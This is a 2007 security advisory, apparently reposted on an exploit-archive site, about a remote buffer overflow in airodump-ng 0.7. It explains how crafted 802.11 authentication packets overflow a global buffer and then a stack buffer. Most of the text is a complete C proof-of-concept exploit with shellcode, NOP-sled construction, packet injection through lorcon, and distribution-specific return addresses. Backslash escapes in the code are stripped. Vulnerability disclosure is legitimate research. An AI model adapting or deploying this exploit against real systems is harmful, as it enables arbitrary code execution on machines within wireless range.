Aircrack-ng (airodump-ng) remote buffer overflow vulnerability

2007.04.19
Credit: Jonathan So
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Product Name: Aircrack-ng (0.7) Vendor: http://www.aircrack-ng.org Date: 13 April, 2007 Author: Jonathan So < jonny [ @ ] nop-art [ dot ] net> Advisory URL: http://www.nop-art.net/advisories/airodump-ng.txt I. DESCRIPTION A buffer overflow vulnerability has been found in airodump-ng, part of the aircrack-ng package. The vulnerability could allow an attacker to transmit specially crafted 802.11 packets to execute arbitrary code on a remote machine running the airodump-ng tool. II. DETAILS Airodump-ng fails to check the size of 802.11 authentication packets before copying into an insufficiently sized global buffer. As a result it is possible to overwrite another global variable passed as the size parameter to a subsequent memcpy() operation, in order to overflow a stack buffer. Airodump-ng must be logging packets with the -w or --write option to be vulnerable to this attack. The wireless device must also be capturing packets in monitor mode. This vulnerability has been successfully exploited against on an x86 Linux 2.6.20 machine running airodump-ng 0.7. Other versions and platforms are also likely to be affected. III. CREDIT Discovered by Jonathan So Additional thanks to Ash Willis IV. EXPLOIT /** * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit * * Proof of concept exploit for a stack (and heap) based * overflow in airodump-ng. The vulnerability can be exploited * by transmitting some specially crafted 802.11 packets to * execute arbitrary code on any machines within range * that are sniffing with a vulnerable version of airodump-ng. * * This exploit requires the lorcon 802.11 packet injection * library, see http://802.11ninja.net for details. * * Compiling: * * gcc -o airodump-remote airodump-remote.c -lorcon * * Usage: * * ./airodump-ng <interface> <driver> <channel> <headertype> [return addr] * * Drivers supported by lorcon: * * wlan-ng, hostap, airjack, prism54, madwifing, madwifiold, * rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw * * Header types: * * 0 - None (not tested) * 1 - Fake prism54 header * 2 - Fake radiotap header (not tested) * * Return addresses: * * Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934 * Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934 * * Example usage: * * ./airodump-ng wlan0 prism54 11 1 0x8054934 * * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt * Author: Jonathan So [ jonny [ @ ] nop-art.net ] * * Copyright (C) 2007 Jonathan So */ #include <stdio.h> #include <stdlib.h> #include <tx80211.h> // Linux x86 sys_write shellcode. Any arbitrary shellcode should work // here, it doesn't matter if it contains nulls. Maximum 792 bytes. char shellcode[] = "xebx14" // jmp get_message // start: "x59x31xdbx31xd2xb2" "x1b" // message length "x31xc0x88x04x11" "xb0x04xcdx80" // sys_write "xb0x01xcdx80" // sys_exit // get_message: "xe8xe7xffxffxff" // call start "Stop sniffing our network!!"; // message text int main(int argc, char **argv) { tx80211_t tx; tx80211_packet_t txp; uint8_t packet[1044]; uint8_t *ppacket; int headertype; unsigned ret_addr = 0x8054934; FILE *fp; if(argc<5) { printf("usage: %s <interface> <driver> <channel> <arptype> [ret_addr]n", argv[0]); exit(1); } if(argc>5) { ret_addr = strtoul(argv[5], NULL, 16); } headertype = atoi(argv[4]); if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != TX80211_ENOERR) { fprintf(stderr, "Error initializing driver"); return 1; } if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != TX80211_ENOERR) { fprintf(stderr, "Error setting inject moden"); return 1; } if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) { fprintf(stderr, "Error setting channeln"); } if (tx80211_open(&tx) < 0) { fprintf(stderr, "Unable to open interfacen"); return 1; } txp.packet = packet; // Fill packet with nops memset(packet, 0x90, sizeof(packet)); switch (headertype) { case 0: // No arptype, just send raw packet ppacket = packet; break; case 1: // Send fake prism header memcpy(packet+4, "x08x00x00x00", 4); ppacket = packet + 8; break; case 2: // Send fake radiotap header packet[0] = 0; packet[2] = 3; ppacket = packet + 3; break; default: printf("Invalid header type. Valid options are:n"); printf(" 0 - nonen"); printf(" 1 - prism54n"); printf(" 2 - radiotapn"); return 1; } // set some necessary 802.11 header fields ppacket[0] = 0xB0; ppacket[1] = 0; ppacket[24] = 1; ppacket[25] = 0; ppacket[26] = 2; ppacket[27] = 0; txp.plen = 512 + (ppacket - packet); if (tx80211_txpacket(&tx, &txp) < txp.plen) { fprintf(stderr, "Error sending packet 1n"); return 1; } ppacket[26] = 4; if (tx80211_txpacket(&tx, &txp) < txp.plen) { fprintf(stderr, "Error sending packet 2n"); return 1; } // Insert shellcode at end of nopsled memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode)); // Overwrite some char*, needs to be a valid address memcpy(ppacket+1028, &ret_addr, 4); // Overwrite global variable sk_len, used as argument to memcpy memcpy(ppacket+1032, "x20x05x00x00", 4); // Return address memcpy(ppacket+820, &ret_addr, 4); ppacket[1] = 0x40; txp.plen = 1036 + + (ppacket - packet); if (tx80211_txpacket(&tx, &txp) < txp.plen) { fprintf(stderr, "Error sending packet 3n"); return 1; } tx80211_close(&tx); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top